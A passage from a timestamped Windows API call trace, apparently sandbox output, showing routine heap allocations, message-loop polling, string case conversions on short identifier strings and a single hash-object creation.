hHeap=0x25c0000) returned 1 [0190.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0190.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.833] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.833] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.833] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0190.833] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.833] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0190.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.834] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.834] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.834] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0190.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.834] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.834] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.834] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.834] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.834] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0190.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0190.835] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0190.835] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0190.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.835] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0190.835] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.835] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.835] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.836] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.836] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.836] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.836] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.836] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.836] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0190.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.836] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.836] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.837] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0190.837] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.837] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.837] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.837] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.837] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.837] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.837] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.838] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.838] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0190.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.838] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.838] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.838] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.838] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.838] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.838] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.838] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0190.839] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.839] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.839] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.839] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.839] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.839] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.839] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0190.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0190.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0190.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.840] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.840] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.840] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0190.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0190.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0190.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.840] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0190.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0190.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0190.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0190.841] CryptCreateHash (in: hProv=0xaa3868, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0190.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0190.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0190.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0190.841] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0190.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.841] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.841] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.842] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.842] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.843] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0190.843] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.843] 